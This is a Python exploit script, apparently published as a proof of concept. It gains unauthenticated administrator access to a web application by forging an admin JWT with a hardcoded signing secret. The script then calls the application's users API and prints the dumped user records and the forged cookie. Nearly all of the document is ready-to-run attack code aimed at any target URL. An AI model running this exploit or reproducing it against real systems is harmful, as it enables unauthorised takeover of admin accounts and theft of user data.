Unauthenticated_admin_access.py

### Discovery: Omri Baso & Fabien Aunay
### Exploit Author: Omri Baso

try:
    import jwt 
except ImportError:
    print("\n[-] python3 -m pip install jwt")
    sys.exit(1)

import sys
import requests
from datetime import datetime, timedelta, timezone
from jwt.utils import get_int_from_datetime
from jwt.jwk import OctetJWK


def main():
    if len(sys.argv) < 2:
        print("\n[-] Usage: %s %s <target path>" % (sys.executable,sys.argv[0]))
        print("Example:\n\t%s %s http://127.0.0.1:9080/" % (sys.executable,sys.argv[0]))
        sys.exit(1)


    target = sys.argv[1]

    try:
        key = OctetJWK(b"167f0db2-f83e-4baa-9736-d56064a5b415")
    except Exception:
        print("\n[-] python3 -m pip uninstall PyJWT")
        print("\n[-] python3 -m pip install jwt")
        print("\n[-] Exploit is not written using PyJWT!")
        sys.exit(1)

    message = {"username":"admin"
    ,"useradmin": True,"usergroup":"admin","externalauth": False,"externaltype":"","displayname":"Homer Admin","avatar":"/etc/passwd",
        'exp': get_int_from_datetime(datetime.now(timezone.utc) + timedelta(hours=24)),
    }

    instance = jwt.JWT()
    print("\n\n[+] Generating the following cookie: \n\n%s\n\n" % message)
    admin_cookie = instance.encode(message, key, alg='HS256')

    if(admin_cookie):
        if not (target.endswith("/")):
            target += "/"


        headers = {'Authorization': 'Bearer %s' % admin_cookie}

        target = target + "api/v3/users"
        headers = {"Accept": "application/json, text/plain, */*", "Authorization": "Bearer %s" % admin_cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Referer": "%spreference/users" % target, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
        r = requests.get(target, headers=headers)

        if(r.status_code == 201):
            print("[+] Obtained Admin access!!\n")
            print("\n\n[+] Dumping Users\n\n")
            print("----------------------------------------------")
            print(r.text)

            print("\n[+] Admin Cookie: \n%s" % admin_cookie)
        else:
            print("[-] failed")
            print(r.text)

        
main()